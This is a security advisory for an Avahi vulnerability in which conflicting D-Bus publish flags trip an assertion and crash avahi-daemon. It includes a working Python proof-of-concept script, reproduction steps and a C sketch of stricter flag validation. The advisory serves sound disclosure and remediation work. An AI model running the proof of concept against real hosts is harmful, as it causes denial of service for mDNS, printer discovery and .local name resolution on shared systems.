https://github.com/avahi/avahi/security/advisories/GHSA-w65r-6gxh-vhvc advises:
Reachable assertion in transport_flags_from_domain (CVE-2026-34933)

Moderate
evverx published GHSA-w65r-6gxh-vhvc Apr 1, 2026

Affected versions: <=v0.9-rc3
Patched versions:    v0.9-rc4

Description
-----------
In all versions up to and including 0.8 and 0.9-rc3, any unprivileged local
user can crash avahi-daemon by sending a single D-Bus method call with
conflicting publish flags.

The AVAHI_PUBLISH_USE_MULTICAST (0x100) and AVAHI_PUBLISH_USE_WIDE_AREA (0x80)
flags are individually accepted by the AVAHI_FLAGS_VALID() validation macro at
entry.c:201-209 (for AddRecord) and entry.c:593-597 (for AddService), since
both are listed in the allowed flags bitmask. However, these flags are mutually
exclusive, and the function transport_flags_from_domain() at entry.c:57 enforces
this exclusivity with an assert():

static void transport_flags_from_domain(AvahiServer *s, AvahiPublishFlags *flags, const char *domain) {
    assert(flags);
    assert(domain);

    assert(!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags & AVAHI_PUBLISH_USE_WIDE_AREA)));
    // ...
}

When both flags are set simultaneously (flags = 0x180), the assertion fails,
causing the daemon to abort with SIGABRT. The D-Bus system bus policy
(avahi-dbus.conf) allows any local user to call EntryGroupNew and AddService
without restrictions.

Root cause
----------
The flags validation (AVAHI_FLAGS_VALID) and the mutual exclusivity check
(assert in transport_flags_from_domain) are performed at different layers
with no coordination:

 1. AVAHI_FLAGS_VALID(flags, mask) checks !(flags & ~mask) -- it verifies that
    no unknown bits are set, but does not check for mutually exclusive
    combinations.
 2. transport_flags_from_domain() enforces mutual exclusivity via assert(),
    which is a fatal operation in a production daemon.

Affected D-Bus methods
----------------------
The following D-Bus methods on org.freedesktop.Avahi.EntryGroup accept a flags
parameter that reaches the vulnerable function:

Method            D-Bus handler            Core function
AddService        dbus-entry-group.c:166   server_add_service_strlst_nocopy()
                                           -> transport_flags_from_domain()
AddServiceSubtype dbus-entry-group.c:213   server_add_service_strlst_nocopy()
                                           -> transport_flags_from_domain()
AddAddress        dbus-entry-group.c:280   avahi_server_add_address()
                                           -> transport_flags_from_domain()
AddRecord         dbus-entry-group.c:311   avahi_server_add()
                                           -> server_add_internal()
                                           -> transport_flags_from_domain()
UpdateServiceTxt  dbus-entry-group.c:370   server_update_service_txt_strlst_nocopy()
                                           -> transport_flags_from_domain()

Proof of Concept
----------------

#!/usr/bin/env python3
"""Any local unprivileged user can crash avahi-daemon with this script."""
import dbus

AVAHI_PUBLISH_USE_WIDE_AREA = 128   # 0x80
AVAHI_PUBLISH_USE_MULTICAST = 256   # 0x100
CONFLICTING_FLAGS = AVAHI_PUBLISH_USE_WIDE_AREA | AVAHI_PUBLISH_USE_MULTICAST

bus = dbus.SystemBus()
server = dbus.Interface(
    bus.get_object('org.freedesktop.Avahi', '/'),
    'org.freedesktop.Avahi.Server'
)

# Create an entry group
eg_path = server.EntryGroupNew()
eg = dbus.Interface(
    bus.get_object('org.freedesktop.Avahi', eg_path),
    'org.freedesktop.Avahi.EntryGroup'
)

# Trigger the crash: AddService with both MULTICAST and WIDE_AREA flags
eg.AddService(
    dbus.Int32(-1),                    # interface (AVAHI_IF_UNSPEC)
    dbus.Int32(-1),                    # protocol (AVAHI_PROTO_UNSPEC)
    dbus.UInt32(CONFLICTING_FLAGS),    # flags = 0x180 (CRASH)
    dbus.String("PoC-Service"),        # name
    dbus.String("_http._tcp"),         # type
    dbus.String(""),                   # domain
    dbus.String(""),                   # host
    dbus.UInt16(8080),                 # port
    dbus.Array([], signature='ay')     # TXT records
)

Reproduction
------------

# On any Linux system with avahi-daemon running:
apt install python3-dbus    # if not already installed
python3 poc.py

# Verify crash:
systemctl status avahi-daemon
# Expected: "avahi-daemon.service: Main process exited, code=exited, status=134/n/a"

journalctl -u avahi-daemon -n 5
# Expected: "entry.c:57: transport_flags_from_domain: Assertion
#   `!((*flags & AVAHI_PUBLISH_USE_MULTICAST) && (*flags & AVAHI_PUBLISH_USE_WIDE_AREA))' failed."

Impact
------

 * Any unprivileged local user can immediately crash the avahi-daemon process.
 * All mDNS/DNS-SD services on the host become unavailable.
 * Applications relying on nss-mdns for .local hostname resolution fail.
 * Network service discovery (printers, Chromecast, AirPlay, etc.) stops.
 * While systemd auto-restarts the daemon, repeated crashes cause a persistent
   DoS.

Credit
------
Discovered by Guillaume MEUNIER - Head of VOC France - Orange Cyberdefense on
2026-03-10.

Fix
---
It was addressed in <https://github.com/avahi/avahi/pull/891>.

Severity: Moderate - 5.5 / 10
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVE ID: CVE-2026-34933
Weakness: CWE-617


--
        -Alan Coopersmith-                 [email protected]
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
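
The gap described under "Root cause", as an added illustration in C: this is not Avahi's code and not the change made in pull request 891. The flag values and the mask test come from the advisory; the function names, return codes, the PUBLISH_OTHER bit and the exclusive-group table are assumptions made for the example.

```c
#include <stdio.h>

/* Flag values quoted in the advisory. */
#define PUBLISH_USE_WIDE_AREA 0x80u
#define PUBLISH_USE_MULTICAST 0x100u
#define PUBLISH_OTHER         0x01u  /* constructed: stands in for any other allowed bit */
#define ALLOWED_MASK (PUBLISH_USE_WIDE_AREA | PUBLISH_USE_MULTICAST | PUBLISH_OTHER)

/* The mask test the advisory describes: true when no bit outside mask is set. */
#define FLAGS_VALID(flags, mask) (!((flags) & ~(mask)))

enum { FLAGS_OK = 0, ERR_INVALID_FLAGS = -1 };  /* hypothetical return codes */

/* Each entry is a set of bits of which at most one may be set (assumed table). */
static const unsigned exclusive_groups[] = {
    PUBLISH_USE_WIDE_AREA | PUBLISH_USE_MULTICAST,
};

/* Weak form: unknown bits are rejected, conflicting known bits pass. */
static int validate_mask_only(unsigned flags) {
    return FLAGS_VALID(flags, ALLOWED_MASK) ? FLAGS_OK : ERR_INVALID_FLAGS;
}

/* Hardened form: also reject any combination that a later layer would
 * treat as impossible, so caller input never reaches an assert(). */
static int validate_strict(unsigned flags) {
    size_t i;
    if (!FLAGS_VALID(flags, ALLOWED_MASK))
        return ERR_INVALID_FLAGS;
    for (i = 0; i < sizeof exclusive_groups / sizeof exclusive_groups[0]; i++) {
        unsigned set = flags & exclusive_groups[i];
        if (set & (set - 1u))  /* more than one bit of the group is set */
            return ERR_INVALID_FLAGS;
    }
    return FLAGS_OK;
}

int main(void) {
    /* Constructed inputs: each flag alone, both together, an unknown bit. */
    const unsigned samples[] = { 0x80u, 0x100u, 0x180u, 0x181u, 0x200u };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("flags=0x%03x mask_only=%d strict=%d\n", samples[i],
               validate_mask_only(samples[i]), validate_strict(samples[i]));
    return 0;
}
```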
